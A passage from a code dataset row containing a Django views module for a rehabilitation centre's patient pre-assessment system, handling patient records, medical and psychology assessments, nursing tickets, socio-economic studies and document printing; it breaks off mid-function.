index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
12,400 | cfdba341bb0f968101627d1ea53da4fab333473c | #from django.views.decorators.csrf import csrf_exempt
from django.db import IntegrityError, transaction
from django.shortcuts import render, render_to_response, RequestContext, redirect, get_object_or_404
from django.contrib.auth.decorators import login_required, permission_required
from django.http import JsonResponse, HttpResponse, Http404
from .models import Paciente, HojaPrevaloracion, Expediente, HojaFrontal, ServicioExpediente, EstudioSocioE1, EstudioSocioE2, EstudioSocioE2IngresosEgresos, EstructuraFamiliaESE1, ProgramaExpediente, PacienteDataEnfermeria, CartaConsetimiento
from catalogos.models import Municipio, Estado, Ocupacion, Escolaridad, Referidopor, ServicioCree, ProgramaCree, MotivoEstudioSE, IngresosEgresos, TipoVivienda, ComponenteVivienda, ServicioVivienda, TenenciaVivienda, ConstruccionVivienda, BarreraArquitectonicaVivienda, ClasificacionEconomica, MensajesEnfemeriaTicket, EstadoCivil, Parentesco, MensajesCartaConsentimiento, SeguridadSocial
from .utils import getUpdateConsecutiveExpendiete, getClueExpediente, listCabezerasLocalidades
from .decorators import redirect_view, validViewPermissionRevisionMedica, validViewPermissionRevisionPsicologica, validViewPermissionTrabajoSocial, validViewPermissionImprimirDocumentos, validViewPermissionEnfemeria
from django.contrib.auth.models import User, Group
from datetime import date, datetime
from logs import logger
import sys
import json
#import pdb
# Service name used for the first socio-economic study (pre-consultation stage).
SERVICIO_ESTUDIO_SOCIOECONOMICO1 = "PRECONSULTA"
# Services/programs handled by the psychology views, excluded from the medical review.
SERVICIOS_EXCLUIDOS_MEDICO = ("PSICOLOGIA", "TRABAJO SOCIAL")
PROGRAMAS_EXCLUIDOS_MEDICO = ("INCLUSION EDUCATIVA", "ESCUELA PARA FAMILIAS CON HIJOS CON DISCAPACIDAD", "INCLUSION LABORAL")
# Default consulting-room number stamped on new socio-economic studies.
CONSULTORIO = 1
# 'tipo' discriminator values of the IngresosEgresos catalog.
INGRESO = "INGRESO"
EGRESO = "EGRESO"
# 'tipo' discriminator values of the BarreraArquitectonicaVivienda catalog.
EXTERNAS = "EXTERNAS"
INTERNAS = "INTERNAS"
@redirect_view
def home(request):
    """Render the pre-assessment landing page.

    Supplies every active catalog needed by the patient form plus the
    patients registered today and the requesting user's group.
    """
    contexto = {
        'ocupaciones': Ocupacion.objects.filter(is_active=True),
        'escolaridades': Escolaridad.objects.filter(is_active=True),
        'referidospor': Referidopor.objects.filter(is_active=True),
        'municipios': Municipio.objects.all(),
        'estados': Estado.objects.filter(is_active=True),
        'pacientes': Paciente.objects.filter(fechacreacion=date.today()),
        'grupo': getUserGroupByRequest(request),
    }
    return render_to_response('preconsulta/Prevaloracion.html', contexto, context_instance=RequestContext(request))
@validViewPermissionRevisionMedica
def revisionMedica(request, paciente):
    """Render the medical pre-assessment page for the patient with the given CURP.

    Offers only the services/programs belonging to the medical area (the
    psychology-area entries in SERVICIOS/PROGRAMAS_EXCLUIDOS_MEDICO are
    excluded) and, when they exist, preloads the patient's active file
    (expediente) and the pre-assessment sheet created today so the form
    opens in edit mode.
    """
    tmppaciente = get_object_or_404(Paciente, curp=paciente)
    # A tuple works directly with __in; the original wrapped the constants
    # in redundant list comprehensions.
    servicios = ServicioCree.objects.filter(is_active=True).exclude(servicio__in=SERVICIOS_EXCLUIDOS_MEDICO)
    programas = ProgramaCree.objects.filter(is_active=True).exclude(programa__in=PROGRAMAS_EXCLUIDOS_MEDICO)
    parentesco = Parentesco.objects.filter(is_active=True)
    tmpHojaPrevaloracion = None
    expediente = None
    try:
        expediente = Expediente.objects.get(paciente__id=tmppaciente.id, is_active=True)
        tmpHojaPrevaloracion = HojaPrevaloracion.objects.get(expediente__id=expediente.id, fechacreacion=date.today())
    except Exception:
        # Narrowed from a bare 'except:' so SystemExit/KeyboardInterrupt
        # propagate. As in the original flow, a missing sheet for today
        # also hides an existing file from the template.
        expediente = None
    contexto = {'servicios' : servicios, 'programas' : programas, 'curp' : paciente,
                'hojaPrevaloracion': tmpHojaPrevaloracion, 'expediente': expediente,
                'edad':tmppaciente.edad, 'parentesco': parentesco}
    return render_to_response('preconsulta/PrevaloracionMedica.html', contexto, context_instance=RequestContext(request))
@validViewPermissionRevisionPsicologica
def psicologicaPrevaloracion(request, paciente):
    """Render the psychology pre-assessment page for the patient with the given CURP.

    Offers only the psychology-area services/programs (the entries in
    SERVICIOS/PROGRAMAS_EXCLUIDOS_MEDICO) and, when they exist, preloads
    the patient's active file and today's pre-assessment sheet.
    """
    tmppaciente = get_object_or_404(Paciente, curp=paciente)
    # A tuple works directly with __in; the redundant list comprehensions
    # from the original were removed.
    servicios = ServicioCree.objects.filter(is_active=True, servicio__in=SERVICIOS_EXCLUIDOS_MEDICO)
    programas = ProgramaCree.objects.filter(is_active=True, programa__in=PROGRAMAS_EXCLUIDOS_MEDICO)
    tmpHojaPrevaloracion = None
    expediente = None
    try:
        expediente = Expediente.objects.get(paciente__id=tmppaciente.id, is_active=True)
        tmpHojaPrevaloracion = HojaPrevaloracion.objects.get(expediente__id=expediente.id, fechacreacion=date.today())
    except Exception:
        # Narrowed from a bare 'except:'. As in the original flow, a
        # missing sheet for today also hides an existing file.
        expediente = None
    contexto = {'curp' : paciente, 'servicios': servicios, 'programas': programas,
                'hojaPrevaloracion': tmpHojaPrevaloracion, 'expediente': expediente}
    return render_to_response('preconsulta/PrevaloracionPsicologica.html', contexto, context_instance=RequestContext(request))
@validViewPermissionEnfemeria
def enfermeriaPrevaloracion(request, paciente):
    """Render the nursing ticket page for the patient with the given CURP.

    Shows the patient's full name, the current timestamp, the active
    informational message and -- when one was captured today -- the
    patient's nursing vitals record.
    """
    tmppaciente = get_object_or_404(Paciente, curp=paciente)
    nombreCompletoPaciente = "%s %s %s" %(tmppaciente.nombre, tmppaciente.apellidoP, tmppaciente.apellidoM)
    fechaActual = datetime.now() #date.today()
    # Assumes exactly one active message exists -- .get() raises otherwise.
    mensajeInformativo = MensajesEnfemeriaTicket.objects.get(is_active=True)
    dataEnfermeria = None
    try:
        dataEnfermeria = PacienteDataEnfermeria.objects.get(paciente__id=tmppaciente.id,fechacreacion=date.today())
    except Exception:
        # Narrowed from a bare 'except:'. No record today (or duplicates):
        # the template simply renders an empty form.
        pass
    contexto = {'curp' : paciente, 'edad' : tmppaciente.edad, 'nombreCompletoPaciente' : nombreCompletoPaciente,
                'fecha' : fechaActual, 'mensajeInformativo' : mensajeInformativo, 'dataEnfermeria': dataEnfermeria}
    return render_to_response('preconsulta/PrevaloracionEnfermeria.html', contexto, context_instance=RequestContext(request))
@validViewPermissionTrabajoSocial
def estudioSPrevaloracion(request, paciente):
    """Render the socio-economic study (social work) page for the patient.

    Loads every active catalog that feeds the form and, when the patient
    already has a study registered today, preloads both study parts so
    the form opens in edit mode with the study's selections separated
    from the remaining catalog options.
    """
    tmppaciente = get_object_or_404(Paciente, curp=paciente)
    # Active catalogs for the form's dropdowns and checklists.
    ocupaciones = Ocupacion.objects.filter(is_active=True)
    escolaridades = Escolaridad.objects.filter(is_active=True)
    motivosEstudio = MotivoEstudioSE.objects.filter(is_active=True)
    ingresos = IngresosEgresos.objects.filter(tipo=INGRESO, is_active=True)
    egresos = IngresosEgresos.objects.filter(tipo=EGRESO, is_active=True)
    tipoVivienda = TipoVivienda.objects.filter(is_active=True)
    componenteVivienda = ComponenteVivienda.objects.filter(is_active=True)
    servicioVivienda = ServicioVivienda.objects.filter(is_active=True)
    tenenciaVivienda = TenenciaVivienda.objects.filter(is_active=True)
    construccionVivienda = ConstruccionVivienda.objects.filter(is_active=True)
    barrerasInternasVivienda = BarreraArquitectonicaVivienda.objects.filter(tipo=INTERNAS,is_active=True)
    barrerasExternasVivienda = BarreraArquitectonicaVivienda.objects.filter(tipo=EXTERNAS,is_active=True)
    clasificacionEconomica = ClasificacionEconomica.objects.filter(is_active=True)
    estadoCivil = EstadoCivil.objects.filter(is_active=True)
    parentesco = Parentesco.objects.filter(is_active=True)
    seguridadSocial = SeguridadSocial.objects.filter(is_active=True)
    # NOTE(review): these defaults are the model *classes* (not instances or
    # None); when the lookups below fail the template receives the class
    # object. Presumably the template only truth-tests them -- confirm.
    estudioSE1 = EstudioSocioE1
    estudioSE2 = EstudioSocioE2
    expediente = Expediente
    estructuraFamiliar = None#EstructuraFamiliaESE1.objects
    ingresos_egresosEstudio = EstudioSocioE2IngresosEgresos
    ingresos_egresos = IngresosEgresos
    barrerasViviendaEstudio = BarreraArquitectonicaVivienda
    barrerasVivienda = BarreraArquitectonicaVivienda
    try:
        expediente = Expediente.objects.get(paciente__id=tmppaciente.id, is_active=True)
        estudioSE1 = EstudioSocioE1.objects.get(expediente__id=expediente.id, fechaestudio=date.today())
        estudioSE2 = EstudioSocioE2.objects.get(estudiose__id=estudioSE1.id)
        estructuraFamiliar = EstructuraFamiliaESE1.objects.filter(estudiose__id=estudioSE1.id)
        ingresos_egresosEstudio = EstudioSocioE2IngresosEgresos.objects.filter(estudio__id=estudioSE2.id) # income/expense rows already captured for this study
        ingresos_egresos = IngresosEgresos.objects.filter(is_active=True).exclude(id__in=[ie.ingreso_egreso.id for ie in ingresos_egresosEstudio]) # catalog rows the study does not have yet
        barrerasViviendaEstudio = estudioSE2.barreravivienda.all()
        barrerasVivienda = BarreraArquitectonicaVivienda.objects.filter(is_active=True).exclude(id__in=[b.id for b in barrerasViviendaEstudio])
    except:
        # No study today (or no active file): offer the full catalogs and
        # leave the class-object defaults above for the remaining keys.
        ingresos_egresos = IngresosEgresos.objects.filter(is_active=True)
        barrerasVivienda = BarreraArquitectonicaVivienda.objects.filter(is_active=True)
    # NOTE(review): 'motivosEsutdio' (typo) is the key the template expects.
    contexto = {
        'ocupaciones' : ocupaciones, 'motivosEsutdio' : motivosEstudio, 'egresos' : egresos,
        'ingresos' : ingresos, 'tipoVivienda' : tipoVivienda, 'componentesVivienda' : componenteVivienda,
        'servicioVivienda' : servicioVivienda, 'tenenciaVivienda' : tenenciaVivienda,
        'construccionVivienda' : construccionVivienda, 'barrerasInternasVivienda' : barrerasInternasVivienda,
        'barrerasExternasVivienda' : barrerasExternasVivienda, 'escolaridades' : escolaridades, 'curp' : paciente,
        'clasificacionEconomica' : clasificacionEconomica, 'estudioSE1': estudioSE1, 'estudioSE2': estudioSE2,
        'estructuraFamiliar': estructuraFamiliar, 'estadoCivil': estadoCivil, 'parentesco': parentesco,
        'ingresos_egresosEstudio': ingresos_egresosEstudio, 'ingresos_egresos': ingresos_egresos, 'barrerasVivienda': barrerasVivienda,
        'barrerasViviendaEstudio': barrerasViviendaEstudio, 'seguridadSocial': seguridadSocial
    }
    return render_to_response('preconsulta/PrevaloracionEstudioS.html', contexto, context_instance=RequestContext(request))
@validViewPermissionImprimirDocumentos
def imprimirDocumentos(request, paciente):
    """Render the printable document set for a patient's active file.

    Gathers the file (expediente), consent letter, pre-assessment sheet,
    front sheets, both socio-economic study parts and every related
    catalog -- with the study's own selections separated from the
    remaining catalog options -- and renders them into one printable
    template. Responds 404 when any required header record is missing.
    """
    paciente = get_object_or_404(Paciente, curp=paciente)
    fechaActual = date.today()
    """
    Primero se hace el query de los encabezados (El expediente, hojas de prevaloracion y frontal, estudios socioeconomicos),
    si no cuenta con alguno de ellos y si no se hicieron el mismo dia respondera con un error 404
    """
    # (Above: the header records are queried first; if any is missing the
    # view responds with a 404.)
    try:
        expediente = Expediente.objects.get(paciente__id=paciente.id, is_active=True)
        cartaConsentimiento = CartaConsetimiento.objects.get(expediente__id=expediente.id)
        hojaPrevaloracion = HojaPrevaloracion.objects.get(expediente__id=expediente.id)
        serviciosExpediente = ServicioExpediente.objects.filter(expediente__id=expediente.id) # services assigned to this file
        programasExpediente = ProgramaExpediente.objects.filter(expediente__id=expediente.id) # programs assigned to this file
        servicios = ServicioCree.objects.filter(is_active=True).exclude(id__in=[s.servicio.id for s in serviciosExpediente]) # CREE services the file does not have yet
        programas = ProgramaCree.objects.filter(is_active=True).exclude(id__in=[p.programa.id for p in programasExpediente]) # CREE programs the file does not have yet
        hojaFrontal = HojaFrontal.objects.filter(expediente__id=expediente.id)
        estudioSE1 = EstudioSocioE1.objects.get(expediente__id=expediente.id)
        estructuraFamiliar = EstructuraFamiliaESE1.objects.filter(estudiose__id=estudioSE1.id)
        estudioSE2 = EstudioSocioE2.objects.get(estudiose__id=estudioSE1.id)
        mensajeCartaC = MensajesCartaConsentimiento.objects.get(is_active=True)
    except:
        # Any missing (or duplicated) header record is reported as 404.
        raise Http404
    #tempIE = estudioSE2.ingresos_egresos.all()
    ingresos_egresosEstudio = EstudioSocioE2IngresosEgresos.objects.filter(estudio__id=estudioSE2.id) # income/expense rows captured for the study
    ingresos_egresos = IngresosEgresos.objects.filter(is_active=True).exclude(id__in=[ie.ingreso_egreso.id for ie in ingresos_egresosEstudio]) # catalog rows the study does not have yet
    # Housing attributes the study selected ...
    componentesViviendaE = estudioSE2.componentevivienda.all()
    serviciosViviendaE = estudioSE2.serviciovivienda.all()
    tenenciasViviendaE = estudioSE2.tenenciavivienda.all()
    construccionViviendaE = estudioSE2.construccionvivienda.all()
    barrerasViviendaE = estudioSE2.barreravivienda.all()
    # ... versus the remaining catalog options.
    componentesVivienda = ComponenteVivienda.objects.filter(is_active=True).exclude(id__in=[c.id for c in componentesViviendaE])
    serviciosVivienda = ServicioVivienda.objects.filter(is_active=True).exclude(id__in=[s.id for s in serviciosViviendaE])
    tenenciasVivienda = TenenciaVivienda.objects.filter(is_active=True).exclude(id__in=[t.id for t in tenenciasViviendaE])
    construccionVivienda = ConstruccionVivienda.objects.filter(is_active=True).exclude(id__in=[con.id for con in construccionViviendaE])
    barrerasVivienda = BarreraArquitectonicaVivienda.objects.filter(is_active=True).exclude(id__in=[b.id for b in barrerasViviendaE])
    # Negative difference flags a deficit for the printable summary.
    # NOTE(review): computed as excedente - deficit -- confirm field semantics.
    deficitExcedente = estudioSE2.excedente - estudioSE2.deficit
    deficit = None
    if deficitExcedente < 0:
        deficit = True
    # Pad the printable services table up to 20 rows with empty ones.
    rowsVacios = 20 - len(serviciosExpediente)
    rows = list()
    for i in range(rowsVacios):
        rows.append(i)
    contexto = {'curp' : paciente.curp, 'paciente' : paciente, 'expediente' : expediente,
                'hojaPrevaloracion': hojaPrevaloracion, 'hojaFrontal' : hojaFrontal, 'estudioSE1' : estudioSE1,
                'estructuraFamiliar' : estructuraFamiliar, 'estudioSE2' : estudioSE2, 'serviciosExpediente': serviciosExpediente,
                'servicios' : servicios, 'programas' : programas, 'programasExpediente' : programasExpediente,
                'ingresos_egresos' : ingresos_egresos, 'ingresos_egresosEstudio' : ingresos_egresosEstudio,
                'componentesVivienda' : componentesVivienda, 'serviciosVivienda' : serviciosVivienda,
                'tenenciasVivienda' : tenenciasVivienda, 'construccionVivienda' : construccionVivienda,
                'barrerasVivienda' : barrerasVivienda, 'componentesViviendaE' : componentesViviendaE,
                'serviciosViviendaE' : serviciosViviendaE, 'tenenciasViviendaE' : tenenciasViviendaE,
                'construccionViviendaE' : construccionViviendaE, 'barrerasViviendaE' : barrerasViviendaE, 'rows' : rows,
                'cartaConsentimiento': cartaConsentimiento, 'fechaActual': fechaActual, 'mensajeCartaC': mensajeCartaC,
                'deficitExcedente': deficitExcedente, 'deficit': deficit}
    return render_to_response('preconsulta/ImprimirDocumentos.html', contexto, context_instance=RequestContext(request))
@validViewPermissionImprimirDocumentos
def imprimirDocumentosCaratula(request, paciente):
    """Render the printable cover page (caratula) for the patient's file.

    Uses get_object_or_404 for the file and study lookups so a missing
    record yields a 404, consistent with imprimirDocumentos (the original
    unguarded .get() calls produced a 500 instead).
    """
    paciente = get_object_or_404(Paciente, curp=paciente)
    expediente = get_object_or_404(Expediente, paciente__id=paciente.id, is_active=True)
    estudioSE1 = get_object_or_404(EstudioSocioE1, expediente__id=expediente.id)
    contexto = {'curp' : paciente.curp, 'paciente' : paciente, 'expediente' : expediente,
                'estudioSE1' : estudioSE1,}
    return render_to_response('preconsulta/ImprimirCaratula.html', contexto, context_instance=RequestContext(request))
def update_paciente(request):
    """Update an existing Paciente from POSTed form fields.

    Looks the patient up by the original CURP ('curpPaciente') and
    overwrites its fields with the submitted values, then responds with
    JSON {'isOk': <mensaje>} where 'ok' signals success. Raises Http404
    for non-POST requests.
    """
    if request.POST:
        paciente = get_object_or_404(Paciente, curp=request.POST['curpPaciente'])
        try:
            mensaje = "Error al crear el parciente."
            # Validates that the requesting user exists before saving.
            u = User.objects.get(username=request.user)
            paciente.curp = request.POST['curp']
            paciente.nombre = request.POST['nombre']
            paciente.apellidoP = request.POST['apellidoP']
            paciente.apellidoM = request.POST['apellidoM']
            paciente.edad = request.POST['edad']
            paciente.genero = request.POST['genero']
            paciente.fechanacimiento = request.POST['fechaN']
            paciente.telefonocasa = request.POST['telCasa']
            paciente.telefonocelular = request.POST['celular']
            paciente.localidad = request.POST['localidad']
            # FK columns must be assigned through the single-underscore
            # '<field>_id' attribute. The original '<field>__id' spelling
            # (query-lookup syntax) only created ad-hoc instance attributes,
            # so the foreign keys were never actually updated.
            paciente.estadoprocedente_id = request.POST['estado']
            paciente.municipio_id = request.POST['municipio']
            paciente.referidopor_id = request.POST['referidopor']
            paciente.escolaridad_id = request.POST['escolaridad']
            paciente.ocupacion_id = request.POST['ocupacion']
            paciente.calle = request.POST['calle']
            paciente.entrecalles = request.POST['entreCalles']
            paciente.colonia = request.POST['colonia']
            paciente.numerocasa = request.POST['numCasa']
            paciente.codigopostal = request.POST['codigoPostal']
            #paciente.usuariocreacion__id = u.perfil_usuario.id
            paciente.save()
            mensaje = "ok"
        except IntegrityError as e:
            logger.error(str(e))
            mensaje = "La curp del paciente ya existe en la base de datos."
        except ValueError as e:
            logger.error(str(e))
            mensaje = "Valor no valido, revisar los valores que se ingresan."
        except Exception:
            # Narrowed from a bare 'except:'.
            logger.error(sys.exc_info()[0])
            mensaje = "Error al crear el parciente."
        response = JsonResponse({'isOk': mensaje})
        return HttpResponse(response.content)
    else:
        raise Http404
def get_paciente(request):
    """Return a patient's full record as JSON, looked up by POSTed CURP.

    Raises Http404 for non-POST requests or when the CURP is unknown.
    """
    if not request.POST:
        raise Http404
    p = get_object_or_404(Paciente, curp=request.POST['curpPaciente'])
    payload = {
        'nombre': p.nombre,
        'apellidoP': p.apellidoP,
        'apellidoM': p.apellidoM,
        'edad': p.edad,
        'genero': p.genero,
        'nacimiento': p.fechanacimiento,
        'telcasa': p.telefonocasa,
        'telcelular': p.telefonocelular,
        'localidad': p.localidad,
        'idEstado': p.estadoprocedente.id,
        'idMunicipio': p.municipio.id,
        'idReferidopor': p.referidopor.id,
        'idEscolaridad': p.escolaridad.id,
        'idOcupacion': p.ocupacion.id,
        'calle': p.calle,
        'entrecalles': p.entrecalles,
        'colonia': p.colonia,
        'numerocasa': p.numerocasa,
        'codigopostal': p.codigopostal,
    }
    return HttpResponse(JsonResponse(payload).content)
def addEstudioSocioeconomico(request):
    """Create or update a patient's socio-economic study (parts 1 and 2).

    POST with 'claveEstudio' > 0 updates the existing study pair and
    replaces its family-structure rows; otherwise a new study pair is
    created for today (refused if one already exists), along with its
    family structure, income/expense rows and housing selections, and the
    file's CLUE code is refreshed. Responds with JSON
    {'isOk': <mensaje>, 'curp': ...} where 'ok' signals success.
    Raises Http404 for non-POST requests.
    """
    if request.POST:
        clave = RepresentsInt(request.POST['claveEstudio'])
        if clave > 0:
            # --- update branch: the study already exists ---
            try:
                with transaction.atomic():
                    mensaje = "Error al actualizar los estudios socio economicos."
                    paciente = Paciente.objects.get(curp=request.POST['curp'])
                    estudio1 = EstudioSocioE1.objects.get(id=clave)
                    estudio2 = EstudioSocioE2.objects.get(estudiose__id=estudio1.id)
                    estructuraFamiliar = EstructuraFamiliaESE1.objects.filter(estudiose__id=estudio1.id)
                    estrucFamiliarNueva = request.POST.getlist('EstructuraF[]')
                    # NOTE(review): the lists below are read but never applied
                    # in this update branch -- only the create branch persists
                    # incomes/expenses and housing selections. Confirm intent.
                    ingresos = request.POST.getlist('ingresos[]')
                    egresos = request.POST.getlist('egresos[]')
                    serviciosV = request.POST.getlist('servicios[]')
                    componentesV = request.POST.getlist('componentes[]')
                    construccionV = request.POST.getlist('construccion[]')
                    tenenciasV = request.POST.getlist('tenencias[]')
                    barrerasIV = request.POST.getlist('barrerasI[]')
                    barrerasEV = request.POST.getlist('barrerasE[]')
                    # Part 1: interview and address data (copied from the patient).
                    estudio1.edad = paciente.edad
                    estudio1.estadocivil = request.POST['estadoCivil']
                    estudio1.nombreentevistado = request.POST['nombreEntrevistado']
                    estudio1.apellidosentevistado = request.POST['apellidoEntrevistado']
                    estudio1.calle = paciente.calle
                    estudio1.entrecalles = paciente.entrecalles
                    estudio1.colonia = paciente.colonia
                    estudio1.numerocasa = paciente.numerocasa
                    estudio1.codigopostal = paciente.codigopostal
                    estudio1.clasificacion_id = request.POST['clasifacionEconomica']
                    estudio1.ocupacion_id = paciente.ocupacion.id
                    estudio1.escolaridad_id = paciente.escolaridad.id
                    estudio1.motivoestudio_id = request.POST['motivoEstudio']
                    estudio1.motivoclasificacion = request.POST['justificacionClasf']
                    estudio1.parentescoentrevistado = request.POST['parentescoEntrevistado']
                    estudio1.seguridad_social_id = request.POST['seguridadSocial']
                    # Part 2: economic summary and housing data.
                    # NOTE(review): 'deficit' is not updated here although the
                    # create branch stores it -- confirm whether intentional.
                    estudio2.excedente = request.POST['excedente']
                    estudio2.datosignificativo = request.POST['datosSignificativos']
                    estudio2.diagnosticoplansocial = request.POST['diagnosticoPlanS']
                    estudio2.cantidadbanios = request.POST['cantidadBanios']
                    estudio2.cantidadrecamaras = request.POST['cantidadRecamaras']
                    estudio2.vivienda_id = request.POST['tipoVivienda']
                    # Replace the family-structure rows wholesale.
                    estructuraFamiliar.delete()
                    for estrucF in estrucFamiliarNueva:
                        estructura = json.loads(estrucF)
                        EstructuraFamiliaESE1.objects.create(
                            nombrefamiliar = estructura['nombreF'],
                            apellidosfamiliar = estructura['apellidosF'],
                            parentesco = estructura['parentescoF'],
                            estadocivil = estructura['estadoCivilF'],
                            estudiose_id = estudio1.id,
                            ocupacion_id = estructura['ocupacionF'],
                            escolaridad_id = estructura['escolaridadF'],
                            edad = estructura['edadF'],
                        )
                    estudio1.save()
                    estudio2.save()
                    mensaje = "ok"
            except ValueError as e:
                logger.error(str(e))
                mensaje = "Valor no valido, revisar los valores que se ingresan."
            except:
                logger.error(sys.exc_info()[0])
                mensaje = "Error al actualizar los estudios socio economicos."
        else:
            # --- create branch: first study for this patient today ---
            try:
                with transaction.atomic():
                    mensaje = "Error al crear los estudios socio economicos"
                    paciente = Paciente.objects.get(curp=request.POST['curp'])
                    expediente = Expediente.objects.get(paciente__id=paciente.id, is_active=True)
                    # Refuse a second study on the same day.
                    estuidoTemp = EstudioSocioE1.objects.filter(expediente__id=expediente.id, fechaestudio=date.today())
                    if estuidoTemp:
                        mensaje = "Ya cuenta con un estudio socioeconomico el dia de hoy"
                        response = JsonResponse({'isOk' : mensaje})
                        return HttpResponse(response.content)
                    # JSON-encoded rows/ids posted by the form.
                    estructuraFamiliar = request.POST.getlist('EstructuraF[]')
                    ingresos = request.POST.getlist('ingresos[]')
                    egresos = request.POST.getlist('egresos[]')
                    serviciosV = request.POST.getlist('servicios[]')
                    componentesV = request.POST.getlist('componentes[]')
                    construccionV = request.POST.getlist('construccion[]')
                    tenenciasV = request.POST.getlist('tenencias[]')
                    barrerasIV = request.POST.getlist('barrerasI[]')
                    barrerasEV = request.POST.getlist('barrerasE[]')
                    u = User.objects.get(username=request.user)
                    estudio1 = EstudioSocioE1.objects.create(
                        edad = paciente.edad,
                        estadocivil = request.POST['estadoCivil'],
                        consultorio = CONSULTORIO,#request.POST['consultorio'],
                        nombreentevistado = request.POST['nombreEntrevistado'],
                        apellidosentevistado = request.POST['apellidoEntrevistado'],
                        calle = paciente.calle,
                        entrecalles = paciente.entrecalles,
                        colonia = paciente.colonia,
                        numerocasa = paciente.numerocasa,
                        codigopostal = paciente.codigopostal,
                        clasificacion_id = request.POST['clasifacionEconomica'],
                        ocupacion_id = paciente.ocupacion.id,
                        escolaridad_id = paciente.escolaridad.id,
                        # NOTE(review): hard-coded service id 1 -- confirm it
                        # matches SERVICIO_ESTUDIO_SOCIOECONOMICO1.
                        servicio_id = 1,#request.POST['servicio'],
                        motivoestudio_id = request.POST['motivoEstudio'],
                        expediente_id = expediente.id,
                        usuariocreacion_id = u.perfil_usuario.id,#request.POST['usuario'],
                        motivoclasificacion = request.POST['justificacionClasf'],
                        parentescoentrevistado = request.POST['parentescoEntrevistado'],
                        seguridad_social_id = request.POST['seguridadSocial'],
                    )
                    for i in estructuraFamiliar:
                        estructura = json.loads(i)
                        EstructuraFamiliaESE1.objects.create(
                            nombrefamiliar = estructura['nombreF'],
                            apellidosfamiliar = estructura['apellidosF'],
                            parentesco = estructura['parentescoF'],
                            estadocivil = estructura['estadoCivilF'],
                            estudiose_id = estudio1.id,
                            ocupacion_id = estructura['ocupacionF'],
                            escolaridad_id = estructura['escolaridadF'],
                            edad = estructura['edadF'],
                        )
                    estudio2 = EstudioSocioE2.objects.create(
                        deficit = request.POST['deficit'],
                        excedente = request.POST['excedente'],
                        datosignificativo = request.POST['datosSignificativos'],
                        diagnosticoplansocial = request.POST['diagnosticoPlanS'],
                        cantidadbanios = request.POST['cantidadBanios'],
                        cantidadrecamaras = request.POST['cantidadRecamaras'],
                        estudiose_id = estudio1.id,
                        #usuariocreacion_id = 1,
                        vivienda_id = request.POST['tipoVivienda']
                    )
                    # Per-row amounts for incomes and expenses.
                    for i in ingresos:
                        ingreso = json.loads(i)
                        EstudioSocioE2IngresosEgresos.objects.create(ingreso_egreso_id=ingreso['id'], estudio_id=estudio2.id, monto=ingreso['valor'])
                    for i in egresos:
                        egreso = json.loads(i)
                        EstudioSocioE2IngresosEgresos.objects.create(ingreso_egreso_id=egreso['id'], estudio_id=estudio2.id, monto=egreso['valor'])
                    # Housing many-to-many selections (ids posted by the form).
                    for i in serviciosV:
                        estudio2.serviciovivienda.add(i)
                    for i in componentesV:
                        estudio2.componentevivienda.add(i)
                    for i in construccionV:
                        estudio2.construccionvivienda.add(i)
                    for i in tenenciasV:
                        estudio2.tenenciavivienda.add(i)
                    for i in barrerasIV:
                        estudio2.barreravivienda.add(i)
                    for i in barrerasEV:
                        estudio2.barreravivienda.add(i)
                    # Refresh the file's CLUE code from locality + social security.
                    cabezarasLocalidades = listCabezerasLocalidades()
                    expediente.clue = getClueExpediente(paciente.localidad, cabezarasLocalidades, estudio1.seguridad_social.clave)
                    expediente.save()
                    # The patient's document set is now printable.
                    paciente.imprimir = True
                    paciente.save()
                    mensaje = "ok"
            except ValueError as e:
                logger.error(str(e))
                mensaje = "Valor no valido, revisar los valores que se ingresan."
            except:
                logger.error(sys.exc_info()[0])
                mensaje = "Error al crear los estudios socio economicos."
        # NOTE(review): 'paciente' is only bound inside the try blocks; an
        # early failure there makes this line raise NameError -- confirm.
        response = JsonResponse({'isOk' : mensaje, 'curp': paciente.curp})
        return HttpResponse(response.content)
    else:
        raise Http404
#@csrf_exempt
def addPsicologiaHojaPrevaloracion(request):
    """Record the psychology portion of today's pre-assessment sheet.

    Updates the sheet's short diagnosis and psychology notes, replaces
    the file's psychology-area service/program assignments (those listed
    in SERVICIOS/PROGRAMAS_EXCLUIDOS_MEDICO) and creates or refreshes the
    psychologist's front sheet for today -- all inside one transaction.
    Responds with JSON {'isOk': <mensaje>}, where 'ok' signals success.
    Raises Http404 for non-POST requests.
    """
    if request.POST:
        try:
            with transaction.atomic():
                mensaje = "Error al actualizar la hoja de prevaloracion"
                paciente = Paciente.objects.get(curp=request.POST['curp'])
                expediente = Expediente.objects.get(paciente__id=paciente.id, is_active=True)
                hojaPrev = HojaPrevaloracion.objects.get(expediente__id=expediente.id, fechacreacion=date.today())
                u = User.objects.get(username=request.user)
                servicios = request.POST.getlist('servicios[]')
                programas = request.POST.getlist('programas[]')
                hojaPrev.diagnosticonosologico2 = request.POST['diagnosticoNosologicoBreve']
                hojaPrev.psicologia = request.POST['psicologia']
                hojaPrev.psicologo_id = u.perfil_usuario.id
                hojaPrev.save()
                #tmpVarS = expediente.servicios.filter(servicio__in=[s for s in SERVICIOS_EXCLUIDOS_MEDICO])
                #tmpVarP = expediente.programas.filter(programa__in=[p for p in PROGRAMAS_EXCLUIDOS_MEDICO])
                # Replace only the psychology-area assignments; the medical
                # ones are managed by addHojaPrevaloracion.
                tmpVarS = ServicioExpediente.objects.filter(expediente__id=expediente.id).filter(servicio__servicio__in=[s for s in SERVICIOS_EXCLUIDOS_MEDICO])
                tmpVarP = ProgramaExpediente.objects.filter(expediente__id=expediente.id).filter(programa__programa__in=[p for p in PROGRAMAS_EXCLUIDOS_MEDICO])
                tmpVarS.delete()
                tmpVarP.delete()
                for servicio in servicios:
                    ServicioExpediente.objects.create(
                        expediente_id = expediente.id,
                        servicio_id = servicio,
                        hojaPrevaloracion_id = hojaPrev.id,
                        # NOTE(review): fechaBaja stamped with today's date at
                        # creation -- looks like a default rather than a real
                        # drop date; confirm.
                        fechaBaja = date.today()
                    )
                for programa in programas:
                    ProgramaExpediente.objects.create(
                        expediente_id = expediente.id,
                        programa_id = programa,
                        hojaPrevaloracion_id = hojaPrev.id,
                        fechaBaja = date.today()
                    )
                try:
                    # Refresh the psychologist's front sheet for today...
                    hojaFront = HojaFrontal.objects.get(expediente__id=expediente.id, fechacreacion=date.today(), usuario__id=hojaPrev.psicologo.id)
                    hojaFront.diagnosticonosologico = request.POST['diagnosticoNosologicoBreve']
                    hojaFront.save()
                except:
                    # ...or create one if it does not exist yet.
                    HojaFrontal.objects.create(
